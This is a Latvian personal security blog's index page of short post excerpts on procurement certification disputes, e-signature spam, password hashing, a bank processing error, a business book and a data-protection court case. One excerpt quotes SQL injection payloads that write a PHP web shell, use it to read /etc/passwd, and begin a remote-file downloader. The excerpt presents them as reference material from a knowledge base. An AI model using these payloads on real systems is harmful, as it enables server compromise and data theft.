CISM sertifikāts nav pielīdzinām CISSP, IUB noraida KPMG sūdzību 4

Interesantu rakstu pamanīju defense.lv, kur tika publicēts KPMG nelabvēlīgs IUB lēmums un atzīts, ka konkrētā gadījumā CISM nav ekvivalents CISSP. Sūdzības pamatā bija fakts, ka pasūtītājs (VID) iepirkumā prasīja speciālistu ar CISSP sertifikātu, bet KPMG piedāvāja speciālistu ar pieredzi un CISM sertifikātu uzskatot, ka tas ir alternatīvs CISSP. Kā rezultātā no turpmākas dalības konkursā KPMG tika izslēgts. Kam interesē motivējošā ...

Pat LVRTC nodarbojas ar spamošanu (tiešo pārdošanu) vai kā iegūt papildus reklāmu izmantojot elektronisko parakstu

Lai taupītu savu laiku izvēlējos VID dokumentus iesniegt elektroniski parakstītus izmantojot eparaksts. Ne visai labu pārsteigumu sniedza LVRTC, kas uzreiz pēc dokumenta parakstīšanas ar noteiktu regularitāti sāk iesūtīt IF apdrošināšanas reklāmu un vairāk kārt atgādināt, ka šis kods ir izmantojams līdz 31.12.2012.  Neatceros, ka būtu akceptējis reklāmas saņemšanu un šajā e- vēstulē nav minēts neviens veids kā es ...

Salted Password Hashing – Doing it Right vai kā pareizi veidot hešotas paroles ar salt

Viens labs resurs, kur apskatītas tipiskākās kļūdas un paskaidrots kā rīkoties pareizi: http://crackstation.net/hashing-security.htm Tweet

Swedbank sistēmas kļūdaini apstrādā tranzakcijas

Piefiksēsim vēsturei- 11. jūnijā 2012 Swedbank sistēmā ieviesās kļūda kā rezultātā klientiem norēķinoties vai izņemot naudu tika rezervētas summas dubultā. Lai gan man nav nekādu šaubu, ka banka novērsīs šīs problēmas un izdarīs visu iespējamo/neiespējamo , lai izmeklētu incidenta rašanās iemeslus un šāda situācija neatkārtoties interesanti būtu uzzināt vai banka rēķinās (un kāds būs iegūtais ...

Grāmata: Like A Virgin

Izlasīju RICHARD BRANSON grāmatas Like A Virgin izvilkumu: https://s3-eu-west-1.amazonaws.com/cdn0.virgin.com/misc/RichardBransonLikeAVirgin-DigitalExtract.pdf Ieinteresēja un būs jāizlasa visa grāmata. Pagaidām piefiksēju dažas atziņas. If you don’t enjoy it don’t do it Be innovative – create something different Pride of association works wonders Lead by listening (Never openly criticise people; never lose your temper, and always be quick to applaud a ...

SQL injection Knowledge Base

Pilnīgākais resurss, kuru esmu redzējis saistība ar SQL injekcijām. http://websec.ca/kb/sql_injection Tiem, kam interesē cik vienkārši var izmantojot kļūdaini uzrakstītas komandas un sql augšpielādes shell skatās piemēru šeit: http://websec.ca/kb/sql_injection#MySQL_Writing_Files Examples: To write a PHP shell: SELECT ‘<? system($_GET[\’c\’]); ?>’ INTO OUTFILE ‘/var/www/shell.php’;   and then access it at: http://localhost/shell.php?c=cat%20/etc/passwd To write a downloader: SELECT ‘<? fwrite(fopen($_GET[f], \’w\’), file_get_contents($_GET[u])); ...

“BTA” cenšas izvairīties no soda par nolaidīgu personas datu glabāšanu

Defense blogā ieraudzīju rakstu par BTA (https://defense.lv/2012/07/04/bta-censas-izvairities-no-soda-par-nolaidigu-personas-datu-glabasanu/) un atmiņām pievienoju arī tiesas izrakstu. Šis gadījums šķiet interesants trīs iemeslu dēļ: ir reāls piemērs notiesājošam spriedumam un ir zināms arī soda summa ja paskaidrojumā ir minēta taisnība, tad kāpēc netika saglabāti pierādījumi par urķēsanu? jo vairāk parādīsies notiesājoši spriedumi un tie tiks darīti zināmi sabiedrībai, jo ...